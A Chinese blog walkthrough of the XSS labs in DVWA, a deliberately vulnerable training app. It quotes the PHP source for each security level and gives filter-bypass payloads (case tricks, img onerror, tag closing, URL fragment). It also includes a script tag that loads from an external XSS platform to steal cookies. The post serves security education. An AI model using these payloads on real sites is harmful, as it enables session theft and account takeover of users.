DVWA--XSS详解

最新推荐文章于 2024-05-10 08:33:36 发布
最新推荐文章于 2024-05-10 08:33:36 发布
阅读量8.5k 收藏 69
点赞数 12
分类专栏: WEB安全 文章标签: web javascript js 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/103758559
版权

DVWA–XSS详解

XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。

XSS三种:

反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。

存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。

DOM XSS:通过修改页面的DOM节点形成的XSS。

dvwa之反射型xss

级别:low

代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>
X-XSS-Protection: 0 禁用xss过滤器

此处if判断没有进行任何过滤,直接输出了传入得$name。

payload:

<script>alert("xss")</script>

在这里插入图片描述

可以弹出cookie

<script>alert(document.cookie)</script>

在这里插入图片描述

利用xss平台盗取cookie等信息。

<script src=http://xsspt.com/GkvoaX?1233009></script>

在这里插入图片描述

级别:medium

代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

可以看到用str_replace函数进行了替换

利用大小写绕过:

<scriPt>alert("xss")</scRipt>

在这里插入图片描述

级别:high

代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

添加了对大小写绕过的判断,而且根据正则表达式过滤,提交内容只要有script顺序出现的字母都一律过滤掉,只是过滤了script标签,但是有一些javascript事件后仍然能执行javascript代码,构造payload

<img src=# onerror=alert("xss")>

在这里插入图片描述

级别:Impossible

代码:

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。

dvwa之DOM型xss

DOM型xss不会和后台服务器产生交互,而是通过浏览器的dom树解析。代码流向 前端–>浏览器

级别:low

查看前端和服务器端没有任何代码过滤传递得值

payload:

<script>alert('hack')</script>

在这里插入图片描述

级别:medium

代码:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

stripos() 函数返回字符串在另一个字符串中第一次出现的位置

此处过滤了<script 使用img标签<img src=1 οnerrοr=(‘xss’)>发现没有任何弹窗

发现已经插入了value属性中。我们需要插入到值中,那么可以闭合select和option标签来插入。

在这里插入图片描述

payload:

></select></option><img src=# οnerrοr=alert('xss')>

在这里插入图片描述

级别:high

代码:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

此处使用了白名单过滤,只允许 传的 default值 为 French English German Spanish 其中一个。用中级得payload。代码有个English,此处也符合了白名单得要求。

在这里插入图片描述

tip:URL中#号之后的内容,不会被提交到服务器,可以直接与浏览器进行交互

构造payload:

#<script>alert('xss')</script>

在这里插入图片描述

级别:impossible

服务器没有代码,查看前端代码,我们输入得值流入服务端再出来后没有进行任何得解码,所以就不存在DOM型XSS漏洞了。

在这里插入图片描述

dvwa之存储型xss

trim(string,charlist) : 移除string字符两侧的预定义字符,预定义字符包括\t 、 \n 、\x0B 、\r以及空格,可选参数charlist支持添加额外需要删除的字符

stripslashes(string): 去除掉string字符的反斜杠\

mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。

级别:low

代码:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    //mysql_close();
}
?>

通过insert into把数据注入数据库,产生存储XSS。此处没有对

payload

<script>alert('xss')</script>
级别:medium

代码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

addslashes(string) :函数返回在预定义字符之前添加反斜杠的字符串,预定义字符 ’ 、" 、\ 、NULL

strip_tags(string) :函数剥去string字符串中的 HTML、XML 以及 PHP 的标签

htmlspecialchars(string): 把预定义的字符 “<” (小于)、 “>” (大于)、& 、‘’、“” 转换为 HTML 实体,防止浏览器将其作为HTML元素

可以看到,$message已经被过滤了xss,但是name没有进行严格过滤。可以利用大小写绕过

可以从name中制造xss注入,但是name得值长度被限制。

1.抓包修改数据

2.修改前端代码中得长度限制。

显然第二种方法更有效率,我们来试下:

在这里插入图片描述

修改为100个字符长度。

在这里插入图片描述

输入payload:

<script>alert('xss')</script>

弹出xss代码:

在这里插入图片描述

查看数据库:

在这里插入图片描述

级别:high

代码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

name参数过滤了script标签,但是没过滤img等标签:

payload:

<img src=# onerror=alert("xss")>

在这里插入图片描述

在这里插入图片描述

查看数据库:

在这里插入图片描述

级别:impossible

代码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

此处用htmlspecialchars函数过滤了name和message,不存在注入。

洋洋cc
关注
  • 12
    点赞
  • 69
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA XSS
部分学习记录
09-19 225
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
DVWA------XSS(全)
m0_65712192的博客
12-13 5087
DVWA-----XSS(全)
DVWA-XSS
qq_58091216的博客
04-19 5024
一.DOM型xss 1.low (1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script> (2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击 (3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗 (4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御 2.m.
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建_kali实验xss攻击
最新发布
m0_55030688的博客
05-10 848
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
DVWA之XSS (完整版)
一期一会的博客
03-30 5260
xss DOM型xss
dvwa———xss(全)
GZY0601的博客
09-28 2159
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页中插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3055
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA-master.rar
03-15
**DVWA靶场详解** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为网络安全专业人士提供一个平台来测试他们的渗透测试技能和工具。这个靶场包含了各种常见的Web应用漏洞,如SQL注入、跨站...
DVWA-master.zip
01-05
**DVWA靶场详解** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为网络安全专业人士提供一个平台来练习和学习各种Web应用漏洞。这个靶场包含了多个级别的安全漏洞,从低到高,让使用者...
DVWA学习之XSS(跨站脚本攻击)
mmxhappy的专栏
02-04 907
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!
DVWA学习之XSS(跨站脚本攻击)(超级详细)
热门推荐
weixin_40950781的博客
08-22 1万+
DVWA学习之XSSXSS 跨站脚本攻击0x01 XSS(Cross Site Script)简介0x02 何为XSS0x03 XSS存在的原因0x04 XSS漏洞的危害0x05 XSS 的分类及特点1. 存储型XSS2. 反射型XSS3. MOD型XSS XSS 跨站脚本攻击 0x01 XSS(Cross Site Script)简介 0x02 何为XSS 跨站脚本攻击XSS(Cross Sit...
dvwa中的xss(跨站脚本)攻击
无痕的博客
01-17 2189
xss攻击介绍与在dvwa中的xss攻击演示
[网络安全]DVWA之XSS(Reflected)攻击姿势及解题详析合集
等风来
05-17 1万+
Payload:alert("qiu")由于str_replace() 函数将标签替换为空,且str_replace函数仅执行一次Payload将变为alert("qiu"),从而实现了正常XSS语句的注入在 PHP 中,变量名、函数名、常量名等标识符都是区分大小写的。 例如,$Qiu 和 $qiu 是两个不同的变量因此我们可构造Payload如下来绕过限制:Payload:alert("
安全测试-DVWA 靶场搭建及XSS漏洞原理、挖掘、防御
NeilNiu
01-17 3157
安装dvwa靶场
DVWA靶场系列(六)—— XSS(跨站脚本攻击)
qq_45612828的博客
08-02 2596
DVWA靶场系列(六)—— XSS(跨站脚本攻击)
DVWA—跨站脚本攻击(xss)
qq_54537919的博客
06-27 843
DVWA—跨站脚本攻击(xss) 原理、分类:反射型、存储型、DOM型的low、medium、high
XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建)
tmzy1的博客
03-20 1962
XSS攻击、XSS平台搭建
DVWA靶场之XSS通关详解
qq_62169455的博客
06-27 1243
里面的任意字母改为大写即可),此处也可以通过双写(即写两个嵌套的script)来绕过,即在输入框里面输入代码: alert("GXY")
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值